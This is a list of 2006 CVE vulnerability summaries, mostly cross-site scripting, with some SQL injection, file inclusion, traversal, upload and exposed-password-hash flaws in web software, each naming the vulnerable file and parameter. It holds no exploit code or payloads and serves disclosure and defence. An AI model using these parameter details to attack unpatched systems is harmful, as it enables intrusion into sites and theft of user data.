[CVE-2006-1584] Unspecified vulnerability in index.php in Warcraft III Replay Parser for PHP 1.8c allows remote attackers to inject arbitrary web script or HTML via the page parameter, possibly related to fopen function calls or file uploads. NOTE: post-disclosure analysis by CVE suggests that the "page" parameter is not used in this product, and "id" might be the affected parameter.
[CVE-2006-1583] Cross-site scripting (XSS) vulnerability in index.php in Warcraft III Replay Parser for PHP 1.8c allows remote attackers to inject arbitrary web script or HTML via the page parameter. NOTE: post-disclosure analysis by CVE suggests that the "page" parameter is not used in this product, and "id" might be the affected parameter.
[CVE-2006-1582] Cross-site scripting (XSS) vulnerability in index.php in Blank'N'Berg 0.2 allows remote attackers to inject arbitrary web script or HTML via the _path parameter. NOTE: this might be resultant from the directory traversal issue.
[CVE-2006-1580] Multiple cross-site scripting (XSS) vulnerabilities in Bugzero 4.3.1 and other versions allow remote attackers to inject arbitrary web script or HTML via the (1) msg parameter in query.jsp and (2) entryId parameter in edit.jsp.
[CVE-2006-1577] Multiple cross-site scripting (XSS) vulnerabilities in view_all_set.php in Mantis 1.0.1, 1.0.0rc5, and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) start_day, (2) start_year, and (3) start_month parameters.
[CVE-2006-1575] Multiple cross-site scripting (XSS) vulnerabilities in news.php in QLnews 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) autorx and (2) newsx parameters.
[CVE-2006-1574] Cross-site scripting (XSS) vulnerability in Groupmax World Wide Web, World Wide Web Desktop, World Wide Web for Scheduler, and Desktop for Scheduler, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-1570] Cross-site scripting (XSS) vulnerability in Esqlanelapse 2.0 and 2.2 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-1568] Multiple cross-site scripting (XSS) vulnerabilities in register.php in RedCMS 0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) email, (2) location, or (3) website parameters.
[CVE-2006-1567] Cross-site scripting (XSS) vulnerability in searchresults.asp in SiteSearch Indexer 3.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchField parameter.
[CVE-2006-1562] Multiple cross-site scripting (XSS) vulnerabilities in index.php in vscripts (aka Kuba Kunkiewicz) [V]Book (aka VBook) 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) autor, (2) www, (3) temat, and (4) tresc parameters.
[CVE-2006-1558] Cross-site scripting (XSS) vulnerability in search.php in PHP Script Index allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2006-1556] Multiple cross-site scripting (XSS) vulnerabilities in view_caricatier.php in AL-Caricatier 2.5 allow remote attackers to inject arbitrary web script or HTML via the (1) CatName, (2) CaricatierID, or (3) CatID parameter.
[CVE-2006-1554] Cross-site scripting (XSS) vulnerability in VSNS Lemon 3.2.0 allows remote attackers to inject arbitrary web script or HTML via the name parameter while adding a comment.
[CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
[CVE-2006-1544] Multiple cross-site scripting (XSS) vulnerabilities in news.php in vscripts (aka Kuba Kunkiewicz) VNews 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) autorkomentarza and (2) tresckomentarza parameters.
[CVE-2006-1537] Craig Knudsen WebCalendar 1.1.0-CVS allows remote attackers to obtain sensitive information via a direct request to (1) includes/index.php, (2) tests/add_duration_test.php, (3) tests/all_tests.php, (4) groups.php, (5) nonusers.php, (6) includes/settings.php, (7) includes/init.php, (8) includes/settings.php.orig, (9) includes/js/admin.php, (10) includes/js/edit_entry.php, (11) includes/js/edit_layer.php, (12) includes/js/export_import.php, (13) includes/js/popups.php, (14) includes/js/pref.php, or (15) includes/menu/index.php, which reveal the path in various error messages.
[CVE-2006-1535] Cross-site scripting (XSS) vulnerability in login.php in Phoetux.net PhxContacts 0.93.1 beta and earlier allows remote attackers to inject arbitrary web script or HTML via the m parameter.
[CVE-2006-1532] Cross-site scripting (XSS) vulnerability in search.php in PHP Classifieds 6.18, 6.20, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the searchword parameter.
[CVE-2006-1508] Multiple cross-site scripting (XSS) vulnerabilities in MH Software Connect Daily Web Calendar Software 3.2.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) calendar_id, (2) style_sheet, and (3) start parameters in (a) ViewDay.html.
[CVE-2006-1507] Cross-site scripting (XSS) vulnerability in PHPKIT 1.6.03 allows remote attackers to inject arbitrary web script or HTML via the error parameter to include.php, possibly due to a problem in login/login.php.
[CVE-2006-1504] Multiple cross-site scripting (XSS) vulnerabilities in Arab Portal 2.0 (aka Arab Dynamic Portal or ADP) stable allow remote attackers to inject arbitrary web script or HTML via the title parameter in (1) online.php and (2) download.php.
[CVE-2006-1498] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.5.8 and 1.4.15 allows remote attackers to inject arbitrary web script or HTML via crafted encoded links.
[CVE-2006-1496] Multiple cross-site scripting (XSS) vulnerabilities in index.php in ViHor Design allow remote attackers to inject arbitrary web script or HTML via (1) a remote URL in the page parameter, which is processed by an fopen call, or (2) HTML or script in the page parameter, which is returned to the client in an error message for the failed fopen call.
[CVE-2006-1493] Cross-site scripting (XSS) vulnerability in dir.php in Explorer XP allows remote attackers to inject arbitrary web script or HTML via the chemin parameter. NOTE: it is possible that this issue is resultant from CVE-2006-1492.
[CVE-2006-1487] Cross-site scripting (XSS) vulnerability in ActiveCampaign SupportTrio 2.50.2 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters to the KnowledgeBase search module.
[CVE-2006-1486] Multiple cross-site scripting (XSS) vulnerabilities in index.cfm in realestateZONE 4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) bamin, (2) bemin, (3) pmin, and (4) state parameters.
[CVE-2006-1485] gm-upload.cgi in Greymatter 1.3.1 allows remote authenticated users with upload privileges to execute arbitrary programs by uploading files to locations within the web root. NOTE: the provenance of this information is unknown.
[CVE-2006-1483] Blazix Web Server before 1.2.6, when running on Windows, allows remote attackers to obtain the source code of JSP files via (1) . (dot), (2) space, and (3) slash characters in the extension of a URL.
[CVE-2006-1482] Cross-site scripting (XSS) vulnerability in index.php in ConfTool 1.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-1480] Directory traversal vulnerability in start.php in WebAlbum 2.02 allows remote attackers to include arbitrary files and execute commands by (1) injecting code into local log files via GET commands, then (2) accessing that log via a .. (dot dot) sequence and a trailing null (%00) byte in the skin2 COOKIE parameter.
[CVE-2006-1479] Multiple cross-site scripting (XSS) vulnerabilities in Serge Rey gtd-php (aka Getting Things Done) 0.5 allow remote attackers to inject arbitrary web script or HTML via the Description field in (1) newProject.php, (2) newList.php, and (3) newWaitingOn.php.
[CVE-2006-1478] Directory traversal vulnerability in (1) initiate.php and (2) possibly other PHP scripts in Turnkey Web Tools PHP Live Helper 1.8, and possibly later versions, allows remote authenticated users to include and execute arbitrary local files via directory traversal sequences in the language cookie, as demonstrated by uploading PHP code in a gl_session cookie to users.php, which causes the code to be stored in error.log, which is then included by initiate.php.
[CVE-2006-1477] Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools PHP Live Helper 1.8 allow remote attackers to include and execute arbitrary PHP code via the abs_path parameter in (1) initiate.php, (2) waiting.php, (3) welcome.php, (4) admin/index.php, (5) javascript.php, (6) checkchat.php, and (7) blank.php.
[CVE-2006-1474] Cross-site scripting (XSS) vulnerability in the "failed" functionality in Raindance Web Conferencing Pro allows remote attackers to inject arbitrary web script or HTML via the browser parameter.
[CVE-2006-1466] Xcode Tools before 2.3 for Mac OS X 10.4, when running the WebObjects plugin, allows remote attackers to access or modify WebObjects projects through a network service.
[CVE-2006-1438] Multiple cross-site scripting (XSS) vulnerabilities in Andy's PHP Knowledgebase (aphpkb) 0.57 allow remote attackers to inject arbitrary web script or HTML via the (1) keyword_list parameter to (a) index.php.
[CVE-2006-1437] UPOINT @1 Event Publisher stores sensitive information under the web document root with insufficient access control, which allows remote attackers to read private comments via a direct request to eventpublisher.txt.
[CVE-2006-1436] Multiple cross-site scripting (XSS) vulnerabilities in UPOINT @1 Event Publisher allow remote attackers to inject arbitrary web script or HTML via the (1) Event, (2) Description, (3) Time, (4) Website, and (5) Public Remarks fields to (a) eventpublisher_admin.htm and (b) eventpublisher_usersubmit.htm.
[CVE-2006-1435] Cross-site scripting (XSS) vulnerability in genmessage.php in Accounting Receiving and Inventory Administration (ARIA) 0.99-6 allows remote attackers to inject arbitrary web script or HTML via the Message Field (message parameter).
[CVE-2006-1434] Cross-site scripting (XSS) vulnerability in inscription.php in Annuaire (Directory) 1.0 allows remote attackers to inject arbitrary web script or HTML via the Comment Field (COMMENTAIRE parameter).
[CVE-2006-1432] fusionZONE couponZONE 4.2 allows remote attackers to obtain the full path of the web server, and other sensitive information, via invalid values, as demonstrated using manipulations associated with SQL.
[CVE-2006-1431] Cross-site scripting (XSS) vulnerability in local.cfm in fusionZONE couponZONE 4.2 allows remote attackers to inject arbitrary web script or HTML via URL-encoded (1) srchfor and (2) srchby parameters.
[CVE-2006-1430] Multiple cross-site scripting (XSS) vulnerabilities in CONTROLzx HMS (formerly DRZES) 3.3.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) dedicatedPlanID parameter to dedicated_order.php, (2) sharedPlanID parameter to shared_order.php, (3) plan_id parameter to customers/server_management.php, and (4) email field to customers/forgotpass.php.
[CVE-2006-1429] Cross-site scripting (XSS) vulnerability in accountlogon.cfm in classifiedZONE 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the rtn parameter.
[CVE-2006-1428] Multiple cross-site scripting (XSS) vulnerabilities in phpCOIN 1.2.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the fs parameter to (1) mod.php or (2) mod_print.php.
[CVE-2006-1427] Multiple cross-site scripting (XSS) vulnerabilities in WebAPP 0.9.9.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) action, (2) id, (3) num, (4) board, (5) cat, (6) real, (7) viewcat, (8) img, or (9) curcatname parameter in cgi-bin/index.cgi, or (10) vsSD parameter in /mods/calendar/index.cgi.
[CVE-2006-1425] Cross-site scripting (XSS) vulnerability in track.php in phpmyfamily 1.4.1 allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2006-1418] Cross-site scripting (XSS) vulnerability in default.asp in Caloris Planitia E-School Management System 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2006-1417] Multiple cross-site scripting (XSS) vulnerabilities in Caloris Planitia Online Quiz System (aka Web Quiz pro), possibly 1.0, allow remote attackers to inject arbitrary web script or HTML via the (1) exam parameter in prequiz.asp or (2) msg parameter in student.asp.
[CVE-2006-1416] Cross-site scripting (XSS) vulnerability in afmsearch.aspx in Absolute FAQ Manager .NET 4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search module parameters, possibly the question parameter.
[CVE-2006-1415] Cross-site scripting (XSS) vulnerability in iforget.aspx in dotNetBB 2.42EC SP 3 and earlier allows remote attackers to inject arbitrary web script or HTML via the em parameter.
[CVE-2006-1414] Multiple cross-site scripting (XSS) vulnerabilities in toast.asp in Toast Forums 1.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) author, (2) subject, (3) message, or (4) dayprune parameter.
[CVE-2006-1413] Multiple cross-site scripting (XSS) vulnerabilities in EZHomepagePro 1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) adid or (2) aname parameter in (a) common/email.asp, (b) users/users_search.asp, or (c) users/users_profiles.asp.
[CVE-2006-1412] TFT Gallery 0.10 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the admin password file and obtain password hashes via a direct request to admin/passwd.
[CVE-2006-1411] Cross-site scripting (XSS) vulnerability in Absolute Image Gallery XE 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) the shownew parameter in gallery.asp and (2) unspecified search module parameters.
[CVE-2006-1410] Multiple cross-site scripting (XSS) vulnerabilities in XIGLA Absolute Live Support XE 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) Screen name or (2) Session Topic field.
[CVE-2006-1407] Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3.2.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) txtDomainName parameter to domains.asp or (2) SearchText or (3) UserLevel parameters to default.asp.
[CVE-2006-1406] Multiple cross-site scripting (XSS) vulnerabilities in wbadmlog.aspx in uniForum 4.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) txtuser or (2) txtpassword parameters.
[CVE-2006-1405] Cross-site scripting (XSS) vulnerability in search.aspx in SweetSuite.NET Content Management System (ssCMS) 2.1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.
[CVE-2006-1404] Multiple cross-site scripting (XSS) vulnerabilities in bol.cgi in BlankOL 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) file or (2) function parameter.
[CVE-2006-1401] Multiple cross-site scripting (XSS) vulnerabilities in search.php in Calendar Express 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) allwords or (2) oneword parameter. NOTE: the provenance of this information is unknown
[CVE-2006-1400] Cross-site scripting (XSS) vulnerability in MyTasks/PersonalTaskEdit.asp in Metisware Instructor 1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the Task parameter.
[CVE-2006-1399] Cross-site scripting (XSS) vulnerability in searchresult.php in Meeting Reserve 1.0 beta allows remote attackers to inject arbitrary web script or HTML via the search_term parameter. NOTE: the provenance of this information is unknown
[CVE-2006-1398] Cross-site scripting (XSS) vulnerability in guestbook.php in G-Book 1.0 allows remote attackers to inject arbitrary web script or HTML via the g_message parameter.
[CVE-2006-1396] Multiple cross-site scripting (XSS) vulnerabilities in Cholod MySQL Based Message Board allow remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: the provenance of this information is unknown
[CVE-2006-1394] Multiple cross-site scripting (XSS) vulnerabilities in the Microsoft IIS ISAPI filter (aka application server module) in University of Washington Pubcookie 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
[CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
[CVE-2006-1392] Multiple cross-site scripting (XSS) vulnerabilities in index.cgi in the login server in University of Washington Pubcookie 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified inputs.
[CVE-2006-1391] The (a) Quick 'n Easy Web Server before 3.1.1 and (b) Baby ASP Web Server 2.7.2 allows remote attackers to obtain the source code of ASP files via (1) . (dot) and (2) space characters in the extension of a URL.
[CVE-2006-1384] Cross-site scripting (XSS) vulnerability in apwc_win_main.jsp in the web console in IBM Tivoli Business Systems Manager (TBSM) before 3.1.0.1 allows remote attackers to inject arbitrary web script or HTML via the skin parameter.
[CVE-2006-1377] Cross-site scripting (XSS) vulnerability in img.php in (1) EasyMoblog 0.5.1 and (2) CoMoblog 1.1 allows remote attackers to inject arbitrary web script or HTML via the i parameter.
[CVE-2006-1373] Cross-site scripting (XSS) vulnerability in status_image.php in PHP Live! 3.0 allows remote attackers to inject arbitrary web script or HTML via the base_url parameter.
[CVE-2006-1372] Multiple SQL injection vulnerabilities in 1WebCalendar 4.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) EventID parameter in viewEvent.cfm, (2) NewsID parameter in newsView.cfm, or (3) ThisDate parameter in mainCal.cfm.
[CVE-2006-1369] Cross-site scripting (XSS) vulnerability in Invision Power Board (IPB) 2.1.5 and earlier before 20060308 allows remote attackers to inject arbitrary web script or HTML via a Private Message (PM) in certain circumstances.
[CVE-2006-1363] images.php in Justin White (aka YTZ) Free Web Publishing System (FreeWPS) 2.11 allows remote attackers to execute arbitrary PHP code by uploading a .php file into the /upload directory as specified in the dirPath parameter, then performing a direct request to that file.
[CVE-2006-1361] Cross-site scripting (XSS) vulnerability in OSWiki before 0.3.1 allows remote attackers to inject arbitrary web script or HTML via the username field to (1) list.rhtml or (2) show.rhtml.
[CVE-2006-1358] Unspecified vulnerability in BEA WebLogic Portal 8.1 up to SP5 causes a JSR-168 Portlet to be retrieved from the cache for the wrong session, which might allow one user to see a Portlet of another user.
[CVE-2006-1357] Cross-site scripting (XSS) vulnerability in my.support.php3 in F5 Firepass 4100 SSL VPN 5.4.2 allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2006-1352] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP6 and earlier, and WebLogic Server 6.1 SP7 and earlier allow remote attackers to cause a denial of service (memory exhaustion) via crafted non-canonicalized XML documents.
[CVE-2006-1351] BEA WebLogic Server 6.1 SP7 and earlier allows remote attackers to read arbitrary files via unknown attack vectors related to a "default internal servlet" accessed through HTTP.
[CVE-2006-1349] Multiple cross-site scripting (XSS) vulnerabilities in Musicbox 2.3 Beta 2 allow remote attackers to inject arbitrary web script or HTML via the (1) id and (2) type and (3) show parameters in a top action in (a) index.php
[CVE-2006-1348] Cross-site scripting (XSS) vulnerability in index.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang[*][file] parameter, which is injected into an error message. NOTE: this issue might be resultant from CVE-2006-1346.
[CVE-2006-1344] Cross-site scripting (XSS) vulnerability in VeriSign haydn.exe, as used in Managed PKI (MPKI) 6.0, allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the VHTML_FILE parameter.
[CVE-2006-1338] Webmail in MailEnable Professional Edition before 1.73 and Enterprise Edition before 1.21 allows remote attackers to cause a denial of service (CPU consumption) via unspecified vectors involving "incorrectly encoded quoted-printable emails".
[CVE-2006-1336] Cross-site scripting vulnerability in calendar.php in ExtCalendar 1.0 and possibly other versions before 2.0 allows remote attackers to inject arbitrary web script or HTML via the (1) year, (2) month, (3) next, and (4) prev parameters.
[CVE-2006-1334] Multiple SQL injection vulnerabilities in Maian Weblog 2.0 allow remote attackers to execute arbitrary SQL commands via the (1) entry and (2) email parameters to (a) print.php and (b) mail.php.
[CVE-2006-1331] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Noah's Classifieds 1.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) method or (2) list parameter.
[CVE-2006-1330] Multiple SQL injection vulnerabilities in phpWebsite 0.83 and earlier allow remote attackers to execute arbitrary SQL commands via the sid parameter to (1) friend.php or (2) article.php.
[CVE-2006-1326] Multiple cross-site scripting (XSS) vulnerabilities in Invision Power Board 2.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) result_type, (2) search_in, (3) nav, (4) forums, and (5) s parameters in the Search action to index.php
[CVE-2006-1325] Cross-site scripting (XSS) vulnerability in Streber 0.055 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-1324] Cross-site scripting (XSS) vulnerability in acp/lib/class_db_mysql.php in Woltlab Burning Board (wBB) 2.3.4 allows remote attackers to inject arbitrary web script or HTML via the errormsg parameter when a SQL error is generated.
[CVE-2006-1321] Cross-site scripting (XSS) vulnerability in webcheck before 1.9.6 allows remote attackers to inject arbitrary web script or HTML via the (1) url, (2) title, or (3) author name in a crawled page, which is not properly sanitized in the tooltips of a report.
[CVE-2006-1295] Cross-site scripting (XSS) vulnerability in recherche.php3 in SPIP 1.8.2-g allows remote attackers to inject arbitrary web script or HTML via the recherche parameter.
[CVE-2006-1293] Cross-site scripting (XSS) vulnerability in index.php in Contrexx CMS 1.0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string (PHP_SELF).
[CVE-2006-1291] publish.ical.php in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier does not require authentication for write access to the calendars directory, which allows remote attackers to upload and execute arbitrary PHP scripts via a WebDAV PUT request with a filename containing a .php extension and a trailing null character.
[CVE-2006-1290] Multiple cross-site scripting (XSS) vulnerabilities in Milkeyway Captive Portal 0.1 and 0.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) ipAddress, (2) act, (3) username, and (4) unspecified other parameters in (a) authuser.php
[CVE-2006-1282] CRLF injection vulnerability in inc/function.php in MyBulletinBoard (MyBB) 1.04 allows remote attackers to conduct cross-site scripting (XSS), poison caches, or hijack pages via CRLF (%0A%0D) sequences in the Referrer HTTP header field, possibly when redirecting to other web pages.
[CVE-2006-1281] Cross-site scripting (XSS) vulnerability in member.php in MyBulletinBoard (MyBB) 1.04 allows remote attackers to inject arbitrary web script or HTML via the url parameter, a different vulnerability than CVE-2006-1272. NOTE: 1.10 was later reported to be vulnerable.
[CVE-2006-1277] Cross-site scripting (XSS) vulnerability in signup.php in @1 File Store 2006.03.07 allows remote attackers to inject arbitrary web script or HTML via the (1) real_name, (2) email, and (3) login parameters.
[CVE-2006-1272] Multiple cross-site scripting (XSS) vulnerabilities in member.php in MyBulletin Board (MyBB) 1.0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) aim, (2) yahoo, (3) msn, or (4) website field.
[CVE-2006-1270] Multiple cross-site scripting (XSS) vulnerabilities in zones.php in Inprotect 0.21 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Description field. NOTE: the provenance of this information is unknown
[CVE-2006-1266] Cross-site scripting (XSS) vulnerability in Service_Requests.asp in VPMi Enterprise 3.3 allows remote attackers to inject arbitrary web script or HTML via the Request_Name_Display parameter.
[CVE-2006-1264] Cross-site scripting (XSS) vulnerability in xhawk.net discussion 2.0 beta2 allows remote attackers to inject arbitrary web script or HTML via a Javascript URI in a BBCode img tag.
[CVE-2006-1263] Multiple "unannounced" cross-site scripting (XSS) vulnerabilities in WordPress before 2.0.2 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-1261] Multiple cross-site scripting (XSS) vulnerabilities in ASPPortal 3.00 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-1258] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.8.0.1 allows remote attackers to inject arbitrary web script or HTML via the set_theme parameter.
[CVE-2006-1256] Cross-site scripting (XSS) vulnerability in guestbook.php in Soren Boysen (SkullSplitter) PHP Guestbook 2.6 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2006-1250] Unspecified vulnerability in the Webmail module in Winmail before 4.3 has unknown impact and unknown remote attack vectors.
[CVE-2006-1239] Cross-site scripting (XSS) vulnerability in issue/createissue.aspx in Gemini 2.0 allows remote attackers to inject arbitrary web script or HTML via the rtcDescription$RadEditor1 field. NOTE: the provenance of this information is unknown
[CVE-2006-1233] Multiple cross-site scripting (XSS) vulnerabilities in WMNews allow remote attackers to inject arbitrary web script or HTML via the (1) ArtCat parameter to wmview.php, (2) ctrrowcol parameter to footer.php, or (3) ArtID parameter to wmcomments.php.
[CVE-2006-1230] Multiple cross-site scripting (XSS) vulnerabilities in create.php in vCard 2.x allow remote attackers to inject arbitrary web script or HTML via the (1) card_id, (2) uploaded, (3) card_fontsize, or (4) card_color parameter. NOTE: the card_id vector was later reported to affect vCard 2.9, and the uploaded vector for 2.6.
[CVE-2006-1226] Cross-site scripting (XSS) vulnerability in Drupal 4.5.x before 4.5.8 and 4.6.x before 4.5.8 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-1223] Cross-site scripting (XSS) vulnerability in Jupiter Content Manager 1.1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a Javascript URI in the image BBcode tag.
[CVE-2006-1222] Multiple cross-site scripting (XSS) vulnerabilities in zeroboard 4.1 pl7 allow remote attackers to inject arbitrary web script or HTML via the (1) memo box title, (2) user email, and (3) homepage fields.
[CVE-2006-1216] Cross-site scripting (XSS) vulnerability in bigshow.php in Runcms 1.x allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2006-1215] Cross-site scripting (XSS) vulnerability in misc.php in Woltlab Burning Board (wBB) 2.3.4 allows remote attackers to inject arbitrary web script or HTML via the percent parameter. NOTE: this issue has been disputed in a followup post, although the original disclosure might be related to reflected XSS.
[CVE-2006-1209] PHP Advanced Transfer Manager 1.00 through 1.30 stores sensitive information, including password hashes, under the web root with insufficient access control, which allows remote attackers to download each password hash via a direct request for a users/[USERNAME] file.
[CVE-2006-1207] PHP Upload Center stores password hashes under the web root with insufficient access control, which allows remote attackers to download each password hash via a direct request for the upload/users/[USERNAME] file.
[CVE-2006-1205] Multiple cross-site scripting (XSS) vulnerabilities in myWebland myBloggie 2.1.3 beta and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) confirmredirect and (2) post_id parameters in (a) delcomment.php, as reachable when mode=delcom from index.php
[CVE-2006-1204] Multiple cross-site scripting (XSS) vulnerabilities in txtForum 1.0.4-dev and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) prev, (2) next, and (3) rand5 parameters in (a) index.php
[CVE-2006-1202] Multiple cross-site scripting (XSS) vulnerabilities in textfileBB 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) mess and (2) user parameters in messanger.php, possibly requiring a URL encoded value.
[CVE-2006-1199] Cross-site scripting (XSS) vulnerability in iframe.php in daverave Link Bank allows remote attackers to inject arbitrary web script or HTML via the site parameter.
[CVE-2006-1196] Multiple cross-site scripting (XSS) vulnerabilities in QwikiWiki 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) from and (2) help parameters to (a) index.php
[CVE-2006-1193] Cross-site scripting (XSS) vulnerability in Microsoft Exchange Server 2000 SP1 through SP3, when running Outlook Web Access (OWA), allows user-assisted remote attackers to inject arbitrary HTML or web script via unknown vectors related to "HTML parsing."
[CVE-2006-1182] Adobe Graphics Server 2.0 and 2.1 (formerly AlterCast) and Adobe Document Server (ADS) 5.0 and 6.0 allows local users to read files with certain extensions or overwrite arbitrary files and execute code via a crafted SOAP request to the AlterCast web service in which the request uses the (1) saveContent or (2) saveOptimized ADS commands, or the (3) loadContent command.
[CVE-2006-1175] The WeOnlyDo! SFTP (wodSFTP) ActiveX control is marked as safe for scripting, which allows remote attackers to read and write files in arbitrary locations by accessing the control from a web page.
[CVE-2006-1165] Cross-site scripting (XSS) vulnerability in the mediamanager module in DokuWiki before 2006-03-05 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors relating to "handling EXIF data."
[CVE-2006-1164] Nodez 4.6.1.1 and earlier stores sensitive data in the list.gtdat file under the web document root with insufficient access control, which allows remote attackers to obtain usernames and password hashes by directly accessing list.gtdat.
[CVE-2006-1163] Cross-site scripting (XSS) vulnerability in Nodez 4.6.1.1 allows remote attackers to inject arbitrary web script or HTML via the op parameter. NOTE: it is possible that this issue is resultant from the directory traversal vulnerability.
[CVE-2006-1161] Absolute path traversal vulnerability in Easy File Sharing (EFS) Web Server 3.2 allows remote registered users to execute arbitrary code by uploading a malicious file to the Windows startup folder.
[CVE-2006-1160] Cross-site scripting (XSS) vulnerability in Easy File Sharing (EFS) Web Server 3.2 allows remote attackers to inject arbitrary web script or HTML via the Description field in creating a folder or uploading a file.
[CVE-2006-1159] Format string vulnerability in Easy File Sharing (EFS) Web Server 3.2 allows remote attackers to cause a denial of service (server crash) and possibly execute arbitrary code via format string specifiers in the query string argument in an HTTP GET request.
[CVE-2006-1157] Cross-site scripting (XSS) vulnerability in Vz Scripts ADP Forum 2.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the Subject field (possibly messaggio parameter) when posting a new message in post.php.
[CVE-2006-1155] Cross-site scripting (XSS) vulnerability in manas tungare Site Membership Script before 8 March, 2006 allows remote attackers to inject arbitrary web script or HTML via the Error parameter in (1) login.asp and (2) default.asp.
[CVE-2006-1151] Cross-site scripting vulnerability in index.php in M-Phorum 0.2 allows remote attackers to inject arbitrary web script or HTML via the go parameter.
[CVE-2006-1144] Cross-site scripting (XSS) vulnerability in HitHost 1.0.0 allows remote attackers to inject arbitrary web script or HTML via (1) the user parameter in deleteuser.php and (2) the hits parameter in viewuser.php.
[CVE-2006-1143] Cross-site scripting (XSS) vulnerability in FTPoed Blog Engine 1.1 allows remote attackers to inject arbitrary web script or HTML via the comment_body parameter, as used by the comment field, when posting a comment.
[CVE-2006-1142] Unspecified vulnerability in Ravenous Web Server before 0.7.1 allows remote attackers to access arbitrary rvplg files, with unknown impact.
[CVE-2006-1138] Unspecified vulnerability in the web server code in Xerox CopyCentre and Xerox WorkCentre Pro, running software 1.001.02.073 or earlier, or 1.001.02.074 before 1.001.02.715, allows remote attackers to cause a denial of service (memory corruption) via unknown vectors.
[CVE-2006-1135] Multiple cross-site scripting (XSS) vulnerabilities in sBlog 0.7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) keyword parameter to search.php or (2) username parameter to comments_do.php.
[CVE-2006-1133] Multiple cross-site scripting (XSS) vulnerabilities in vbzoom 1.11 allow remote attackers to inject arbitrary web script or HTML via the UserID parameter to (1) comment.php or (2) contact.php. NOTE: the profile.php/UserName vector is already covered by CVE-2005-2441.
[CVE-2006-1131] Cross-site scripting (XSS) vulnerability in read.php in bitweaver CMS 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the comment_title parameter.
[CVE-2006-1130] Cross-site scripting (XSS) vulnerability in EKINboard 1.0.3 allows remote attackers to inject arbitrary web script or HTML via a Javascript URI in a BBCode img tag.
